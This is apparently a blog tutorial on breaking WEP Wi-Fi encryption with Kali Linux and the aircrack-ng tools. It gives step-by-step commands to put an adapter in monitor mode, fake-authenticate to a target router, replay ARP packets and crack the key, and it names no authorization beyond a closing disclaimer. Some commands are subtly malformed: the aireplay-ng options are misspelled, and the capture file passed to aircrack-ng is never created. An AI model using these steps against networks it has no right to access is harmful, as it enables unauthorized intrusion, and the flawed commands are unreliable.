Network Penetration Testing — Gaining Access
Now, because we’ll be learning ethical hacking in depth in the future, we’ll need a WI-Fi connection, so we’ll look at the different forms of encryption and how to decrypt them in this blog. If your target network implements encryption, you won’t be able to do much until you decrypt it so, we will discuss how to decrypt WEP, WPA, and WPA2 encryptions.
The first encryption we’ll talk about is Wired Equivalent Privacy (WEP), because it’s the oldest and also the easiest to crack. WEP encryption uses an algorithm called RC4;
To break a WEP connection, we must first capture the packets, which are the data transferred by the connected device to the router.
If the network is busy, it will be easier to crack since it will generate more packets; if the network is not busy, it will take some time otherwise, we will have to generate some fake packets using fake authentication.
We can now analyze the IVs and crack the key after capturing some packets.
To begin, let’s boot up our hacking beast, Kali Linux. If you don’t remember how to do this, go back and read the previous blog!
Now, in order to decrypt any encryption (WEP, WPA, WPA2, etc.) or to inject packets, we need a wireless adapter. There are several wireless adapters in the market, and you can buy one of them (Check once whether it supports kali linux and monitor mode)
After you’ve connected it, you’ll need to enable monitor mode. To do so, follow these steps:
- Open Terminal and type -
- ifconfig wlan0 down
- airmon-ng check kill
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- Now we have successfully enabled monitor mode.
Now run the following command to see what networks are available and what encryption methods they use — airodump-ng wlan0
The first is the one with WEP encryption, which we will decrypt in this blog -
If the network is already busy and catching a large number of packets, you can skip to the next step; if it isn’t, we’ll need to construct a fake connection with fakeauth and produce packets using arpreplay.
aireplay-ng -fakeauth 0 -a (bssid of target) -h (mac address of your wifi adapter you can get it through ifconfig) wlan0
We created a fake connection to the router with this command, and now we can create fake packets using the following command -
aireplay-ng -arpreplay -b (bssid of target) -h (mac address of your wifi adapter you can get it through ifconfig) wlan0
Now finally we have started capturing packets now we can analyze it and find the key to do so we have to use aircrack-ng.
aircrack-ng arpreplay-01.cap
Now wait and then its done we will see the password……
The codes we used -
- ifconfig wlan0 down
- airmon-ng check kill
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- airodump-ng wlan0
- aireplay-ng -fakeauth 0 -a (bssid of target) -h (mac address of your wifi adapter you can get it through ifconfig) wlan0
- aireplay-ng -arpreplay -b (bssid of target) -h (mac address of your wifi adapter you can get it through ifconfig) wlan0
- aircrack-ng arpreplay-01.cap
Brain Tattoo:-
- To hack a wep connection, we must first collect a large number of packets
- If the network is not busy, we must first generate packets
- After capturing the packets, we may then analyze and break into it.
So now that you know how to hack wep encryption, stay tuned to learn how to crack wpa/wpa2 encryption.
DISCLAIMER: This Blog Does NOT Promote or encourage Any illegal activities, all contents provided by This blog is meant for EDUCATIONAL And Informational PURPOSE only. We will not be responsible for your any illegal actions.
